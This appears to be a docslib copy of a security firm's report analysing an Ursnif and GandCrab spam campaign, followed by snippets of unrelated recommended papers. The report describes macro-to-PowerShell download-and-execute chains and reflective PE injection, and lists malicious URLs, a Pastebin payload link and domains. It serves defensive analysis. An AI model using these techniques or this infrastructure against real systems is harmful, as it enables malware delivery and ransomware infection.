DOCSLIB.ORG

Ursnif and Gandcrab Campaign with the Macro-Enabled Documents

Total Page:16

File Type:pdf, Size:1020Kb

Download full-text PDF Read full-text
Ursnif and Gandcrab Campaign with the Macro-Enabled Documents Ursnif and GandCrab campaign with the macro-enabled documents Prepared for: LIFARS, LLC and its Subsidiaries Prepared by: Ladislav Bačo Date: 11/02/2019 This document and its content represent confidential information between LIFARS, LLC and company. As such, this document may not be shared with any outside party without the expressed consent of LIFARS, LLC and the company. 1 Ursnif and GandCrab campaign with the macro-enabled documents Overview During the first half of February 2019 there was an increase in occurrences of the Spam messages containing attached documents with the names in the form “Request” followed by the number, like “Request15.doc”. These documents contain slightly obfuscated macros which lead to execution of the PowerShell downloader. This PowerShell downloader connects to the domains registered in Russian Federation and resolved to the Russian IP addresses. It seems that on these servers are hosted malicious content, in many cases detected as the Ursnif malware. Macro-enabled documents The spam messages may contain the password-protected zipped Word document (with password “1234567” written in the email body), or only the document itself. Usually the document is with blue background with text with suggestion to enable macros, or enable editing and content, as we can see on the next pictures: Fig. 1: Documents with request for enabling macros Each type of document contains the specific macro code, in the first case, executed on document open (AutoOpen), in the second case, executed on document close (AutoClose), see Figure 2: 244 Fifth Avenue, Suite 2035, New York, NY 10001 LIFARS.com (212) 222-7061 [email protected] 2 Fig. 2: Olevba tool output, AutoOpen and AutoClose macro execution The macros can be extracted with the olevba tool, it is quite obfuscated, in the first case with multiple junk functions and select statements, in the second case with multiple junk variables. These two types of obfuscation are presented below: Fig. 3: First type of obfuscation Fig. 4: Second type of obfuscation These macros lead after deobfuscation to running powershell with base64-encoded command. In the first type it will execute powershell directly, in the second type it will first execute the shell with the command taken from AlternativeText of one Shape. This alternative 244 Fifth Avenue, Suite 2035, New York, NY 10001 LIFARS.com (212) 222-7061 [email protected] 3 text contains the command for execution of powershell (in some cases the command first run the ‘cmd.exe’ and then ‘powershell’): Fig. 5: First type macro deobfuscated Fig. 6: Second type macro deobfuscated Fig. 7: Second type macro deobfuscated: shape with powershell command PowerShell downloaders Decoding of the base64 encoding reveal that the first PowerShell command is obfuscated (see Fig. 8), but after quick deobfuscation it is clear that this is the PowerShell downloader. It checks if the downloaded executable file has at least 40kB and if yes, it will execute it (Fig. 9). 244 Fifth Avenue, Suite 2035, New York, NY 10001 LIFARS.com (212) 222-7061 [email protected] 4 Fig. 8: Obfuscated PowerShell downloader Fig. 9: Debfuscated PowerShell downloader Decoding of the PowerShell command from the second document will result to the another downloader, which is not obfuscated in this case. It will try two approaches, first, download string and invoke it as the PowerShell command. Second, download executable file and run it via ShellExecute. 244 Fifth Avenue, Suite 2035, New York, NY 10001 LIFARS.com (212) 222-7061 [email protected] 5 Fig. 10: PowerShell downloader from the second document Ursnif campaign Unfortunately, the downloaded content was not present during our analysis and it was not available even during the analysis on Any.Run. But using the VirusTotal domain information we can see that multiple executable files have been downloaded from this domain and most of them has been identified as the Ursnif spyware. Fig. 11: VirusTotal domain information 244 Fifth Avenue, Suite 2035, New York, NY 10001 LIFARS.com (212) 222-7061 [email protected] 6 Fig. 12: VirusTotal detections It seems that there are more domains involved in this campaign, with more “ReqeustXX.doc” documents. Also, on the Any.Run it is possible to see the increase in the number of submissions with these filenames and tagged as the Ursnif. These samples have been submitted since 05th February 2019 until now, and it seems that the campaign still continue, but with decreasing intensity. Fig. 13: Any.Run public submissions From these public submissions we can extract multiple contacted domains by PowerShell downloaders. We can find even more samples with filenames like “Request15.doc” by using the search engines (e.g. Google) targeted on the sites related to malware analysis (e.g. VirusTotal, Hybrid-Analysis,…). With set of these domains and samples, it is possible to reveal even more IOCs of this campaign, like contacted URLs, documents with PowerShell downloaders, downloaded executable files, etc. VirusTotal Graph is very useful tool for visualization of 244 Fifth Avenue, Suite 2035, New York, NY 10001 LIFARS.com (212) 222-7061 [email protected] 7 relationships between malware-related entities. Create an overview of the samples, scope of the campaign, country attribution can be matter of several minutes. In this case, our investigation has resulted in the following graph with malicious domains, URLs, documents and executable files: Fig. 14: VirusTotal Graph of IOCs associated with the Ursnif campaign The domains from the above examples have been resolved to the Russian IP addresses from the start of the attack (the US-one is the exception, the domain pgarfielduozzelda.band has been resolved to it only since 21th February, and the black flags are also the Russian IP address regarding to whois), and also the most of these domains have been registered in Russian Federation. 244 Fifth Avenue, Suite 2035, New York, NY 10001 LIFARS.com (212) 222-7061 [email protected] 8 PowerShell downloader leading to GandCrab ransomware During our analysis the downloaded content was not present on the involved servers and also in the most cases it was not available even during the analysis on sandboxes like Any.Run or Hybrid- Analysis. But after a while, we were able to found at least one analysis at Any.Run, in which the PowerShell downloader successfully downloaded the malicious content. The second document from the first part of our analysis is actually the one sample mentioned above, which Any.Run report contains the downloaded data. Recall from the previous text, the analyzed document contains macros, which lead to execution of the encoded PowerShell command. After decoding we can see the following PowerShell downloader: Fig. 15: Decoded PowerShell downloader The first URL hxxp://89.223.92.190/704e.php (which is supplied to the method DownloadString) was active during the execution at Any.Run, so we can see the downloaded content, which is then invoked as an PowerShell expression (IEX from the picture above is the alias to the commandlet Invoke-Expression). 244 Fifth Avenue, Suite 2035, New York, NY 10001 LIFARS.com (212) 222-7061 [email protected] 9 Fig. 16: Captured communication with malicious URL Fig. 17: Downloaded end executed content from the malicious URL It is not obfuscated, and it is clear that this piece of PowerShell script download and execute string again, but this time, the content is downloaded from Pastebin. However, during the campaign only the 8 AV engines detected this unobfuscated 2nd stage of PowerShell downloader: 244 Fifth Avenue, Suite 2035, New York, NY 10001 LIFARS.com (212) 222-7061 [email protected] 10 Fig. 18: VirusTotal detections of 2nd PowerShell downloader Moreover, the downloaded content from Pastebin has even less detection ratio, with the score 1/69 only: Fig. 19: VirusTotal detections of pastebin content Before we can proceed with this content from Pastebin, it is useful to remind the behavior of the 2nd PowerShell downloader: download and execute script from hxxps://pastebin.com/raw/9see7UfF execute function Invoke-HQLAPCCSDIGBUMKZIHEIZPFSX (probably defined in the content downloaded from Pastebin) 244 Fifth Avenue, Suite 2035, New York, NY 10001 LIFARS.com (212) 222-7061 [email protected] 11 PowerShell injector from Pastebin Now, let’s continue with Pastebin’s content. It is mostly unobfuscated PowerShell script, too. It seems that only two function names are partially mangled: Invoke-HSOAWYAZUAGTMWM and Invoke-HQLAPCCSDIGBUMKZIHEIZPFSX mentioned above. Also the parameters of these functions are readable, and we can found names like PEBytes, ExeArgs, ProcName and ProcId, which give us the sense of what this script is probably able to do. Fig. 20: PowerShell script from Pastebin Scrolling down the script, we found the code related to the structure of PE files like headers, sections, imports and exports, and code for accessing the Win32 API functions often uses for code injection, like VirtualProtect, WriteProcessMemory, CreateRemoteThread. 244 Fifth Avenue, Suite 2035, New York, NY 10001 LIFARS.com (212) 222-7061 [email protected] 12 Fig. 21: PowerShell code related to the structure of PE files Fig. 22: PowerShell code related to the Win32 API functions used for code-injection This code is pretty-formatted and easily readable with meaningful variable and function names, unlike the macros and PowerShell from the first part of analysis. It is a reason for assumption that this code is copy-pastes from some publicly known tool. Trying to search for code snippets will bring us to the PowerSploit’s Invoke-ReflectivePEInjection. Yes, its name is self-describing, this script performs reflective injection of PE file (DLL library) into desired process and also loads all of the dependencies of the injected PE file. This PowerSploit’s Invoke-ReflectivePEInjection looks very similar to our Pastebin’s content, with one big difference at the end of our sample: the function Invoke- HQLAPCCSDIGBUMKZIHEIZPFSX containing Base64-encoded data used as the PEBytes argument of the function Invoke-HSOAWYAZUAGTMWM, which is the renamed function Invoke-ReflectivePEInjection from the PowerSploit: 244 Fifth Avenue, Suite 2035, New York, NY 10001 LIFARS.com (212) 222-7061 [email protected] 13 Fig.
Load more

Recommended publications
  • Exploring the X64
    Exploring the x64 Junichi Murakami Executive Officer, Director of Research Fourteenforty Research Institute, Inc. Who am I? • Junichi Murakami – @Fourteenforty Research Institute, Inc. – Both Windows and Linux kernel development – Reversing malware and P2P software, etc. – Speaker at: • Black Hat 2008 US and Japan, AVAR 2009, RSA Conference(2009-) – Instructor at Security & Programming Camp(2006-) 2 Environment • Windows 7 x64 Edition • Visual Studio 2008 • Windbg • IDA Pro Advanced – STD doesn’t support x64, an offering is needed! 4 Agenda • Windows x64 • ABI(Application Binary Interface) • API Hooking • Code Injection 5 Windows x64 • Native x64 and WoW64 • Virtual Address Space – 2^64 = 16 Exa Byte ( Exa: 10^18) – but, limited to 16TB by Microsoft • File/Registry reflection • New 64-bit APIs – IsWow64Process, GetNativeSystemInfo, etc. 6 ABI • Binary Format • Register • Calling Convention • Exception Handling • Systemcall(x64, WoW64) 11 Binary Format(Cont.) • Some fields were extended to 64-bits – IMAGE_NT_HEADERS.IMAGE_OPTIONAL_HEADER • ImageBase • SizeOfStackReserve • SizeOfStackCommit • SizeOfHeapReserve • SizeOfHeapCommit 13 Calling Convention • first 4 parameters are passed by RCX, RDX, R8, R9 – 5th and later are passed on the stack • caller allocates register home space on the stack • RAX is used for return values • leaf / non-leaf function – leaf function: never use stack – PE32+ contains non-leaf function’s information in its EXCEPTION DIRECTORY • Register’s volatility – volatile: RAX, RCX, RDX, R8-R11 15 Exception Handling •
    [Show full text]
  • Through the Looking Glass: Webcam Interception and Protection in Kernel
    VIRUS BULLETIN www.virusbulletin.com Covering the global threat landscape THROUGH THE LOOKING GLASS: and WIA (Windows Image Acquisition), which provides a WEBCAM INTERCEPTION AND still image acquisition API. PROTECTION IN KERNEL MODE ATTACK VECTORS Ronen Slavin & Michael Maltsev Reason Software, USA Let’s pretend for a moment that we’re the bad guys. We have gained control of a victim’s computer and we can run any code on it. We would like to use his camera to get a photo or a video to use for our nefarious purposes. What are our INTRODUCTION options? When we talk about digital privacy, the computer’s webcam The simplest option is just to use one of the user-mode APIs is one of the most relevant components. We all have a tiny mentioned previously. By default, Windows allows every fear that someone might be looking through our computer’s app to access the computer’s camera, with the exception of camera, spying on us and watching our every move [1]. And Store apps on Windows 10. The downside for the attackers is while some of us think this scenario is restricted to the realm that camera access will turn on the indicator LED, giving the of movies, the reality is that malware authors and threat victim an indication that somebody is watching him. actors don’t shy away from incorporating such capabilities A sneakier method is to spy on the victim when he turns on into their malware arsenals [2]. the camera himself. Patrick Wardle described a technique Camera manufacturers protect their customers by incorporating like this for Mac [8], but there’s no reason the principle into their devices an indicator LED that illuminates when can’t be applied to Windows, albeit with a slightly different the camera is in use.
    [Show full text]
  • Operating System Boot from Fully Encrypted Device
    Masaryk University Faculty of Informatics Operating system boot from fully encrypted device Bachelor’s Thesis Daniel Chromik Brno, Fall 2016 Replace this page with a copy of the official signed thesis assignment and the copy of the Statement of an Author. Declaration Hereby I declare that this paper is my original authorial work, which I have worked out by my own. All sources, references and literature used or excerpted during elaboration of this work are properly cited and listed in complete reference to the due source. Daniel Chromik Advisor: ing. Milan Brož i Acknowledgement I would like to thank my advisor, Ing. Milan Brož, for his guidance and his patience of a saint. Another round of thanks I would like to send towards my family and friends for their support. ii Abstract The goal of this work is description of existing solutions for boot- ing Linux and Windows from fully encrypted devices with Secure Boot. Before that, though, early boot process and bootloaders are de- scribed. A simple Linux distribution is then set up to boot from a fully encrypted device. And lastly, existing Windows encryption solutions are described. iii Keywords boot process, Linux, Windows, disk encryption, GRUB 2, LUKS iv Contents 1 Introduction ............................1 1.1 Thesis goals ..........................1 1.2 Thesis structure ........................2 2 Boot Process Description ....................3 2.1 Early Boot Process ......................3 2.2 Firmware interfaces ......................4 2.2.1 BIOS – Basic Input/Output System . .4 2.2.2 UEFI – Unified Extended Firmware Interface .5 2.3 Partitioning tables ......................5 2.3.1 MBR – Master Boot Record .
    [Show full text]
  • Minimum Hardware and Operating System
    Hardware and OS Specifications File Stream Document Management Software – System Requirements for v4.5 NB: please read through carefully, as it contains 4 separate specifications for a Workstation PC, a Web PC, a Server and a Web Server. Further notes are at the foot of this document. If you are in any doubt as to which specification is applicable, please contact our Document Management Technical Support team – we will be pleased to help. www.filestreamsystems.co.uk T Support +44 (0) 118 989 3771 E Support [email protected] For an in-depth list of all our features and specifications, please visit: http://www.filestreamsystems.co.uk/document-management-specification.htm Workstation PC Processor (CPU) ⁴ Supported AMD/Intel x86 (32bit) or x64 (64bit) Compatible Minimum Intel Pentium IV single core 1.0 GHz Recommended Intel Core 2 Duo E8400 3.0 GHz or better Operating System ⁴ Supported Windows 8, Windows 8 Pro, Windows 8 Enterprise (32bit, 64bit) Windows 10 (32bit, 64bit) Memory (RAM) ⁵ Minimum 2.0 GB Recommended 4.0 GB Storage Space (Disk) Minimum 50 GB Recommended 100 GB Disk Format NTFS Format Recommended Graphics Card Minimum 128 MB DirectX 9 Compatible Recommended 128 MB DirectX 9 Compatible Display Minimum 1024 x 768 16bit colour Recommended 1280 x 1024 32bit colour Widescreen Format Yes (minimum vertical resolution 800) Dual Monitor Yes Font Settings Only 96 DPI font settings are supported Explorer Internet Minimum Microsoft Internet Explorer 11 Network (LAN) Minimum 100 MB Ethernet (not required on standalone PC) Recommended
    [Show full text]
  • Server Support Interview Questions and Answers Guide
    Server Support Interview Questions And Answers Guide. Global Guideline. https://www.globalguideline.com/ Server Support Interview Questions And Answers Global Guideline . COM Server Support Job Interview Preparation Guide. Question # 1 Tell me where are cluster logs stored? Answer:- Please share your answers. Read More Answers. Question # 2 What are the Logical / Physical Structures of the AD Environment? Answer:- Active Directory Logical components are Forests, Trees, Domains, OUs and Objects. Active Directory Physical components are Domain Controllers, Sites and subnets. Read More Answers. Question # 3 What applications or services use AD application partitions? Name a couple? Answer:- Application partition contains the information of application data and other data related to application as well. But it does not contain any data related AD object such as USER, COMPUTER and GROUP. The saved data will be replicated to some of the particular DC not to all the DCs. Read More Answers. Question # 4 What are the types of hard disks used in servers? Answer:- Mostly we use scsi hardrive in server due few reason to it, high scalability & flexibility in raid array, faster from other type of hdd interface like-sata,ata,ide also it reliable & compatible with older scsi devices Read More Answers. Question # 5 What are some of the command-line tools available for managing a Windows 2003 Server/Active Directory environment? Answer:- Command Line Tools 1) GPupdate 2) Where 3) SystemInfo 4) CSVDE 5) LDIFDE 6) CMDCONS 7) Ipconfig 8) RoboCopy 9) CMDHere 10) PathPing Read More Answers. Question # 6 What if a FSMO server role fails? Answer:- FSMO roles are important role in server .
    [Show full text]
  • Programming Model Intel Itanium 64
    11/11/2003 64-bit computing AMD Opteron 64 Application of Win32 Executable File Legacy 64 bit platforms Inbuilt 128-bit bus DDR memory controller with memory bandwidth speed up to 5.3GB/s. Infectors on Intel Itanium and AMD Benefits of 64-bit processors Opteron Based Win64 Systems Use of hyper transport protocol, “glueless” architecture. Oleg Petrovsky and Shali Hsieh Increased integer dynamic range Computer Associates International Inc. Available in up to 8 way configuration with the clock speeds 1 Computer Associates Plaza, Islandia, NY 11749, Much larger addressable memory space of 1.4 GHz, 1.6 GHz and 1.8 GHz . USA Benefits to database, scientific and cryptography Reuses already familiar 32-bit x86 instruction set and applications extends it to support 64-bit operands, registers and memory pointers. AMD64 Programming Model AMD64: Programming model Intel Itanium 64 X86 32-64 64 bit Itanium line of processors is being developed by Intel XMM8 X86 80-Bit Extends general use registers to 64-bit, adds additional eight 64-Bit X87 general purpose 64-bit registers. Itanium - 800 MHz, no on die L3 cache, Itanium 2 - 1GHz, RAX EAX AX 3MB L3 on die, Itanium 2003 (Madison) - 1.5 GHz, 6MB L3 on die cache, 410M transistors, largest integration on a RBX Reuses x86 instruction set. single silicon crystal today. XMM15 RCX Runs 32-bit code without emulation or translation to a native Itanium line of processors utilizes more efficient and robust XMM0 than legacy x86 instruction set architecture F instruction set. R8 L A Itanium has to use x86-to-IA-64 decoder a specifically Minimizes learning curve.
    [Show full text]
  • Sample2.Js Malware Summary
    Threat Analysis Report Summary Threat Malicious Level File Name sample2.js MD5 Hash 580E637B97B16698CC750B445223D5C0 Identifier SHA-1 Hash 07E507426F72522DABFECF91181D7F64DC3B8D23 Identifier SHA-256 Hash 790999F47B2FA4396FF6B0A6916E295D832A12B3495A87590C859A1FE9D73245 Identifier File Size 3586 bytes File Type ASCII text File 2015-11-06 09:26:23 Submitted Duration 38 seconds Sandbox 27 seconds Replication Engine Analysis Engine Threat Name Severity GTI File Reputation --- Unverified Gateway Anti-Malware JS/Downloader.gen.f Very High Anti-Malware JS/Downloader.gen.f Very High YARA Custom Rules Sandbox Malware.Dynamic Very High Final Very High Sample is malicious: f inal severit y level 5 Behavior Classif icat ion Networking Very High Exploiting, Shellcode High Security Solution / Mechanism bypass, termination and removal, Anti Unverified Debugging, VM Detection Spreading Unverified Persistence, Installation Boot Survival Unverified Hiding, Camouflage, Stealthiness, Detection and Removal Protection Unverified Data spying, Sniffing, Keylogging, Ebanking Fraud Unverified Dynamic Analysis Action Severity Malware behavior: networking activities from non-executable file Very High ATTENTION: connection made to a malicious website (see Web/URL Very High reputation for details) Detected suspicious Java Script content High Downloaded data from a webserver Low Modified INTERNET_OPTION_CONNECT_RETRIES: number of times that Low WinInet attempts to resolve and connect to a host Connected to a specific service provider Low Cracks a URL into its component
    [Show full text]
  • How Will You Troubleshoot the Issue? What Are the Steps to Followed? A
    1. A user in a corporate network contacts service desk saying he/she has lost network connectivity: How will you troubleshoot the issue? What are the steps to followed? A. First I will check the network cable is plugged in or not. Then check the network connections and the ip address is assigned or not. Then check connecting to website or not. IP conflict. 2. A User calls in and complains that her computer and network is running very slow. How would go about troubleshooting it? A. 3. How would you create an email account for a user already in AD? A. Open Microsoft Outlook if you are using office 2000, and click on "Tools" tab. Go to "Email Accounts". There you can find two option like Email and Directory. Click on "Add a new Account" and click next. If you are using Exchange Server then click over there, this depends on that particular Organization. According to the their setup you have to choose. And if you are using POP3 server then next popup will come along with your name, email address POP3 and SMTP IP address, Password etc. and after that click on Next and finish it..... 4. A PC did not receive an update from SMS. What steps would we take to resolve this? A. If SMS not updated in client system. 1. Need to check system getting IPaddress or not. 2. Need to check system in domain or not 3.Ensure that windows firewall should be off. 5. How do you set the IP address by using the command prompt A.
    [Show full text]
  • Boot Problem Solutions B 102/1
    B102.qxp_July 2018 25/05/2018 10:00 Page 23 BcdEdit: Boot Problem Solutions B 102/1 If Windows Goes on Strike while Booting Up: Use BcdEdit to Take Back Control Using the information given in this article you will be able to: Edit your Windows system’s boot configuration, Remove an old operating system from the boot menu, Restore a faulty boot sector using BootRec. On Windows XP, you could change the boot menu and configure the process simply by editing the BOOT.INI file. This was especially useful if you had a multi- boot system, and needed to quickly change the options displayed in the menu when you start up your PC. With the introduction of Windows 7, everything changed, and modifying your boot menu became much more complicated than editing a single file. That’s because Microsoft replaced the BOOT.INI file with the BCD (Boot Configuration Data) database. Unfortunately, this data could no longer be edited with a text editor and now it is only possible to make configuration changes using the BcdEdit tool. In this article, I’ll show you how to use the BcdEdit program in order to add operating systems to the boot configuration data, or remove entries from the list of displayed operating systems. • BcdEdit: The New Boot File Editor in Windows .... .......... B 102/2 • BcdEdit: The Boot Configuration Data Editor .... ............. B 102/4 • You Should Know these BcdEdit Parameters ..... ............. B 102/5 • Manage Multi-boot Systems Using BcdEdit .... ............... B 102/8 • How to Rescue Windows 10, 8.1 & 7 Multi-boot Systems ..
    [Show full text]
  • Oracle Database Platform Guide for Windows
    Oracle® Database Platform Guide 10g Release 1 (10.1) for Windows Part No. B10113-01 December 2003 Oracle Database Platform Guide, 10g Release 1 (10.1) for Windows Part No. B10113-01 Copyright © 1996, 2003 Oracle Corporation. All rights reserved. Primary Author: Craig B. Foch Contributing Author: Mark Kennedy and Helen Slattery Contributor: David Collelo The Programs (which include both the software and documentation) contain proprietary information of Oracle Corporation; they are provided under a license agreement containing restrictions on use and disclosure and are also protected by copyright, patent and other intellectual and industrial property laws. Reverse engineering, disassembly or decompilation of the Programs, except to the extent required to obtain interoperability with other independently created software or as specified by law, is prohibited. The information contained in this document is subject to change without notice. If you find any problems in the documentation, please report them to us in writing. This document is not warranted to be error-free. Except as may be expressly permitted in your license agreement for these Programs, no part of these Programs may be reproduced or transmitted in any form or by any means, electronic or mechanical, for any purpose. If the Programs are delivered to the U.S. Government or anyone licensing or using the programs on behalf of the U.S. Government, the following notice is applicable: Restricted Rights Notice Programs delivered subject to the DOD FAR Supplement are "commercial computer software" and use, duplication, and disclosure of the Programs, including documentation, shall be subject to the licensing restrictions set forth in the applicable Oracle license agreement.
    [Show full text]
  • Windows Embedded Standard 2009 Prepkit
    MCTSi Exam 70-577 Windows Embedded Standard 2009 Preparation Kit Certification Exam Preparation Automation Not for resale. ii Published by Microsoft Corporation One Microsoft Way Redmond, Washington 98052-6399 This document is for informational purposes only. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS DOCUMENT. The information contained in this document represents the current view of Microsoft Corporation on the issues discussed as of the date of publication. Because Microsoft must respond to changing market conditions, it should not be interpreted to be a commitment on the part of Microsoft, and Microsoft cannot guarantee the accuracy of any information presented after the date of publica- tion. Information in this document, including URL and other Internet Web site references, is subject to change with- out notice. Complying with all applicable copyright laws is the responsibility of the user. Without limiting the rights under copyright, no part of this document may be reproduced, stored in or introduced into a retrieval system, or transmit- ted in any form or by any means (electronic, mechanical, photocopying, recording, or otherwise), or for any pur- pose, without the express written permission of Microsoft Corporation. Microsoft may have patents, patent applications, trademarks, copyrights, or other intellectual property rights covering subject matter in this document. Except as expressly provided in any written license agreement from Microsoft, the furnishing of this document does not give you any license to these patents, trademarks, copyrights, or other intellectual property. Copyright © 2009 Microsoft Corporation. All rights reserved. Internet Explorer, Microsoft, MS-DOS, Visual Studio, Win32, Windows and Windows Vista are trademarks of the Microsoft group of companies.
    [Show full text]
  • Product Name User Guide
    Smart-X Software Solutions Core Configurator User guide _______________________________________________________________ SmartX Software Solutions Core Configurator User Guide Table of content: WELCOME 4 FEATURES AND CAPABILITIES 5 MORE SYSTEM MANAGEMENT TOOLS 6 REQUIREMENTS 8 LICENSING AND INSTALLATION 8 EVALUATION VERSION LIMITATION 8 INSTALLATION 8 INSTALLING CORECONFIG ON WINDOWS 7 / 2008 R2 BETA VERSIONS 9 LICENSING 10 WORKING WITH CORE CONFIGURATOR 11 שגיאה! הסימניה אינה מוגדרת. CORE CONFIGURATOR MAIN SCREEN – 32 BIT HOW IT WORKS 11 CORE CONFIGURATOR MAIN SCREEN – 64 BIT 12 ACTIVATION SCREEN 13 HOW IT WORKS: 13 DISPLAY SETTINGS 14 HOW IT WORKS 14 TIME ZONE 15 HOW IT WORKS 15 REMOTE DESKTOP 16 HOW IT WORKS 16 ACCOUNT MANAGEMENT 17 HOW IT WORKS 17 FIREWALL 18 HOW IT WORKS 18 WINRM 19 HOW IT WORKS 19 NETWORKING 20 HOW IT WORKS 21 COMPUTER NAME 22 HOW IT WORKS 22 FEATURES 23 HOW IT WORKS 23 BACKUP PERFORMANCE 24 DCPROMO 25 HOW IT WORKS 26 AUTOMATIC UPDATES 27 HOW IT WORKS 29 REGIONAL LANGUAGES 30 HOW IT WORKS 30 REGISTRY EDITOR 31 2 SmartX Software Solutions Core Configurator User Guide HOW IT WORKS 31 TASK MANAGER 32 HOW IT WORKS 32 SERVICE 33 HOW IT WORKS 33 SYSTEM INFO 34 SHOW COMMANDS 35 3 SmartX Software Solutions Core Configurator User Guide Chapter 1 Welcome Welcome to Smart-X. Thank you for choosing Core Configurator™, one of the top tools developed by Smart-X Software Solutions expert team in an effort to optimize your everyday work. Core Configurator helps you manage your system efficiently, effortlessly and productively. This chapter describes the features and capabilities of Core Configurator, and lists additional tools in the same field that can help optimize your work environment.
    [Show full text]